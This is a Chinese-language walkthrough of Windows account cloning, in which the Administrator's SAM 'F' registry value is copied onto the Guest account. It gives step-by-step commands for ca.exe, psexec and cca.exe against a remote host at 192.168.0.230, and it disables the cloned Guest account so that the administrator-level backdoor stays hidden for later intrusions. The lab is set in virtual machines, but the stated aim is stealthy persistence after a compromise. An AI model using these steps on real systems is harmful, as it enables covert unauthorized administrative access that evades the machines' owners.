【原理基础】
克隆帐号的原理简单的说是这样:在注册表中有两处保存了帐号的SID相对标志符,一处是SAMDomainsAccountUsers下的子键名,另一处是该子键的子项F的值中。这里微软犯了个不同步它们的错误,登陆时用的是后者,查询时用的是前者。当用admin的F项覆盖其他帐号的F项后,就造成了帐号是管理员权限但查询还是原来状态的情况。即所谓的克隆帐号。
注:ca和cca需要目标开放ipc$,请确认可以与目标建立ipc$。
ca.exe 是一个基于windows系统的远程克隆账号工具。
cca.exe 检查系统是否有克隆账号。psexec是一个远程执行工具,你可以像使用telnet一样使用它。
【实验环境】
工作平台:Windows XP操作系统
服务平台:Virtual PC Windows 2003
辅助平台:Virtual PC Windows XP(远程测试)
软件:ca.exe(下载地址:http://www.sans.org.cn/Soft/294.html )
cca.exe (下载地址:http://www.sans.org.cn/Soft/295.html )
psexec.exe(下载地址:http://www.sans.org.cn/Soft/296.html )
【跟我操作】
下载并运行所用的软件。CA和CCA及psexec都是在命令行下运行的工具,需要通过“开始”->“运行”输入“CMD”切换到其目录才可以运行。
CA克隆帐号
1、首先需要获取远程主机/服务器的管理员权限,假设我们已得到目标主机的管理权限,目标主机的用户名为:Administrator,密码为:123456
2、在MS-DOS中键入命令:ca 192.168.0.230 Administrator “123456” guest 123456
该命令表示IP地址为 192.168.0.230的远程主机中,将guest账号克隆成管理员权限的账号,克隆后的guest帐户密码为123456如图1所示:
图1 进行帐号克隆
当命令执行后,如果得到类似下图中的回显,则说明克隆账号成功。从回显中我们还可以得知克隆账号的处理过程如图2所示:
图2 帐号克隆过程
为了让“后门账号”更加隐蔽。不会被管理员轻易发现,还需要把该Guest账号禁用,这样一来,便可以在以后的入侵过程中使用该被进制的Guest账号实现远程控制了。过程:首先在本地MS-DOS中键入“psexec 192.168.0.230 –u Administrator –p “123456” cmd.exe”获得远程主机的命令行,然后在得到的命令行中键入net user guest /active:no命令来禁用Guest账号过程如图3所示:
图3 禁用guest帐号
使用CCA查看帐号是否被克隆
在上面的步骤中已经成功的把Administrator的权限成功的克隆到了Guest账号上了,下面就来验证这一克隆账号的结果,我们使用与CA配套的工具CCA来验证。过程如下:
在MS-DOS中键入:cca 192.168.0.230 Administrator 123456 命令查看远程主机192.168.0.230上的Administrator账号是否被克隆,输入后按回车键执行,如图4所示:
图4 使用CCA查看帐号是否被克隆
从上图回显中[Guest] AS SAME AS [Administrator]可知Administrator账号已经被Guest克隆。
为了进一步说明后门账号已经克隆成功,下面通过psexec.exe来验证Gues账号是否具有管理员权限,在MS-DOS中键入命令:psexec 192.168.0.230 –u guest –p 123456 cmd.exe 后回车执行。成功获得远程主机/服务器的命令行如图:
图5 检测guest帐号的可用性
由此可见该被禁用的Guest账号可以用来实现远程登陆。这样我们就成功的完成了用户账户的克隆,而且,与原正好具有相同的权限。